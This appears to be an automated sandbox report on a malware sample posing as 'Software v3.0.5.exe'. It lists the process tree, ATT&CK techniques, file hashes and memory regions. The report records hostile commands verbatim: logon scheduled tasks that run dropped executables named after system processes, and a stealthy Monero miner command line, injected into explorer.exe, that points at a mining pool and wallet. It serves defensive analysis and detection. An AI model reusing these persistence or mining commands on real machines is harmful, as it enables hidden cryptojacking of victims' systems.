PID 1728 wrote to memory of 1984	1728	Dcr.exe	WScript.exe
PID 1728 wrote to memory of 1984	1728	Dcr.exe	WScript.exe
PID 1984 wrote to memory of 1676	1984	WScript.exe	cmd.exe
PID 1984 wrote to memory of 1676	1984	WScript.exe	cmd.exe
PID 1984 wrote to memory of 1676	1984	WScript.exe	cmd.exe
PID 1984 wrote to memory of 1676	1984	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1308	1676	cmd.exe	fonthostSvcIntodhcp.exe
PID 1676 wrote to memory of 1308	1676	cmd.exe	fonthostSvcIntodhcp.exe
PID 1676 wrote to memory of 1308	1676	cmd.exe	fonthostSvcIntodhcp.exe
PID 1676 wrote to memory of 1308	1676	cmd.exe	fonthostSvcIntodhcp.exe
PID 1308 wrote to memory of 1608	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1608	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1608	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1244	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1244	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1244	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1152	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1152	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1152	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1860	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1860	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1860	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1692	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1692	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1692	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1616	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1616	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1616	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1276	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1276	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1276	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1312	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1312	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1312	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1956	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1956	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1956	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1572	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1572	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1572	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1916	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1916	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1916	1308	fonthostSvcIntodhcp.exe	schtasks.exe
PID 1308 wrote to memory of 1816	1308	fonthostSvcIntodhcp.exe	cmd.exe
PID 1308 wrote to memory of 1816	1308	fonthostSvcIntodhcp.exe	cmd.exe
PID 1308 wrote to memory of 1816	1308	fonthostSvcIntodhcp.exe	cmd.exe
PID 1816 wrote to memory of 1924	1816	cmd.exe	chcp.com
PID 1816 wrote to memory of 1924	1816	cmd.exe	chcp.com
PID 1816 wrote to memory of 1924	1816	cmd.exe	chcp.com
PID 1816 wrote to memory of 1632	1816	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1640

C:\Users\Admin\AppData\Roaming\Dcr.exe
C:\Users\Admin\AppData\Roaming\Dcr.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1676

C:\fonthostSvc\fonthostSvcIntodhcp.exe
"C:\fonthostSvc\fonthostSvcIntodhcp.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1608

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\dot3\WmiPrvSE.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1244

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\chajei\csrss.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1152

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\capisp\smss.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1860

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1692

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\WMIADAP.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1616

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\portabledevicetypes\WmiPrvSE.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1276

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Windows\System32\C_863\services.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1312

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\WmiPrvSE.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1956

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\snmptrap\lsm.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1572

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "fonthostSvcIntodhcp" /sc ONLOGON /tr "'C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D\fonthostSvcIntodhcp.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E0QiScuzVl.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:1924

C:\Windows\system32\PING.EXE
ping -n 5 localhost
7⤵
- Runs ping.exe
PID:1632

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
"C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Users\Admin\AppData\Roaming\etc.exe
C:\Users\Admin\AppData\Roaming\etc.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
3⤵
PID:1740

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
4⤵
- Creates scheduled task(s)
PID:1684

C:\Users\Admin\AppData\Roaming\services32.exe
"C:\Users\Admin\AppData\Roaming\services32.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
4⤵
PID:992

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:1740

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:660

C:\Users\Admin\AppData\Roaming\xmr.exe
C:\Users\Admin\AppData\Roaming\xmr.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
PID:1804

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:1924

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:1500

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:1148

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:1928

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
d474de575c39b2d39c8583c5c065498a

SHA1
5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

SHA256
7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf

SHA512
7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
5949b6d3d243defafa799d823f5ed708

SHA1
4496aeba537ef54bd1a379647c6f6ab6c37ba668

SHA256
353289617cb102bfcd415c430f0a1ddacd9f509221af0cad8405b2411f799c0e

SHA512
befffe7b2494cd0b7cef6fc7dff6c4edb6b77737048efdaf2ecfdce3b15a173a9eb38cb38e6df31c3dbcb3094a286f44907581677b411db6091890394ce09cbf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
2c569b85f5372c5ab32e71aeec218ff2

SHA1
1d14e6d05d662111d0320faa92625536170cf7a8

SHA256
433b1fddb8e096cf8e93f4457a7c6cef946d4eadb355aff91df29661ccaaa2e4

SHA512
5973c822aeb43af795f99487115665edf327c43893525bc1ab9e2b27f5110f8b9bc6f898c7c845ae53f95c3383e5f4be1ff937b76efc0df6da33908d9f6e5ade

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
630c0a080f1eeeb5e9a6034416ae88ff

SHA1
73796f7accda66566cf2711e320a7e1ee25fe01b

SHA256
33b9a0b15394bbb0a5b7c6e934d58af0d06e36a2db62959f638b56179a4d0021

SHA512
20cf972feb71ff2124f74998ea3732ae94dfd65ced1c59de6b7667629e923fb70dec2e6e2ee9fd20264b94f41b162aeed000a7fd5abf11734e7e5691c2a460d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\E0QiScuzVl.bat
MD5
3a0ba4e0a6dfa7dc60540f4a4b4443fa

SHA1
0ce376430695e3d88752783ec7271ac61e94b285

SHA256
1f41544c3efa94f352d7ab1c6dcb4f1f1d10f2920377b826965792e55c0b4686

SHA512
720dd0dbf02fd265679887011506f9a680d724567723f517118af5ae6516d3dbf4c4a983b1ee5ede7eaa75183aa95943c6d86a9b9469d69b892b0d5d810952fb

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\fonthostSvc\5R3FFGftzpp.vbe
MD5
cb60c41590dc32740e8923ba0cb6df97

SHA1
aabc007b611df20e79fceee539ef63e7f2754304

SHA256
c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2

SHA512
a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

Download Submit
C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
MD5
7245c594f9448bae4a79764fb6897e25

SHA1
1eb300765111494f6c7049b5abbbb0e5725b39aa

SHA256
4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5

SHA512
26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
memory/660-140-0x0000000000000000-mapping.dmp

Download
memory/660-143-0x000000013FAE0000-0x000000013FAE1000-memory.dmp

Filesize
4KB

Download
memory/660-153-0x000000001BB70000-0x000000001BB72000-memory.dmp

Filesize
8KB

Download
memory/992-135-0x0000000000000000-mapping.dmp

Download
memory/1148-138-0x0000000000000000-mapping.dmp

Download
memory/1152-91-0x0000000000000000-mapping.dmp

Download
memory/1244-90-0x0000000000000000-mapping.dmp

Download
memory/1276-95-0x0000000000000000-mapping.dmp

Download
memory/1308-88-0x000000001AFE0000-0x000000001AFE2000-memory.dmp

Filesize
8KB

Download
memory/1308-86-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/1308-83-0x0000000000000000-mapping.dmp

Download
memory/1312-96-0x0000000000000000-mapping.dmp

Download
memory/1424-113-0x00000000005C0000-0x00000000005C6000-memory.dmp

Filesize
